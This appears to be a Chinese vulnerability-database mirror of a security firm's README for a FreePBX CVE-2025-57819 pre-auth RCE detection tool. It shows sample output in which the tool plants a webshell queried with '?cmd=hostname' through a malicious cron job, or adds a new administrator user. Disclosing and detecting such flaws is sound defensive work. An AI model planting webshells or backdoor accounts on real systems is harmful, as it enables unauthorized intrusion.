漏洞平台

POC详情： 5c28645d3d10efbbedf9024a0a9954da3d7f8c1a

来源

https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819

关联漏洞

标题： FreePBX 安全漏洞 (CVE-2025-57819)
描述：FreePBX（前称Asterisk Management Portal）是FreePBX项目的一套通过GUI（基于网页的图形化接口）配置Asterisk（IP电话系统）的工具。 FreePBX 15.0.66版本和17.0.3之前版本存在安全漏洞，该漏洞源于用户数据清理不足，可能导致未经验证访问管理员界面及远程代码执行。

介绍

# CVE-2025-57819 FreePBX Pre-Auth RCE
FreePBX Pre-Auth RCE 1day Detection Artifact Generator Tool
 

# Detection in Action

Detection Artifact Generator attempts to upload the php script or adds a new user if the upload fails.

```
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-FreePBX-CVE-2025-57819.py
        (*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE

          - Piotr and Sonny of watchTowr

[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://freepbx.lab.local/this-is-an-ioc-not-actually-watchTowr-pd3o125j59.php?cmd=hostname
[+] Cleaning.sh malicious cron_job - please confirm manually that there is no malicious entries in asterisk.cron_jobs table
```

If php script upload fails, it'll fallback to the user-based detection. It adds a "random" username with "random" 12 character password.

```
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-FreePBX-CVE-2025-57819.py
        (*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE

          - Piotr and Sonny of watchTowr

[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[-] Webshell not found - falling back to user adding
[+] Adding user: watchTowrm0njzhj0ii / CdEf2DWGpT8u
[+] Verifying if user exists
[+] VULNERABLE: user added
```


# Description

This script attempts to detect if FreePBX is vulnerable to CVE-2025-57819 Pre-Auth RCE.

# Affected Versions

`< 15.0.66`

`< 16.0.89`

`< 17.0.3`

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/

- https://x.com/watchtowrcyber

文件快照


 [4.0K]  /data/pocs/5c28645d3d10efbbedf9024a0a9954da3d7f8c1a
├── [2.9K]  README.md
└── [4.6K]  watchTowr-vs-FreePBX-CVE-2025-57819.py

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。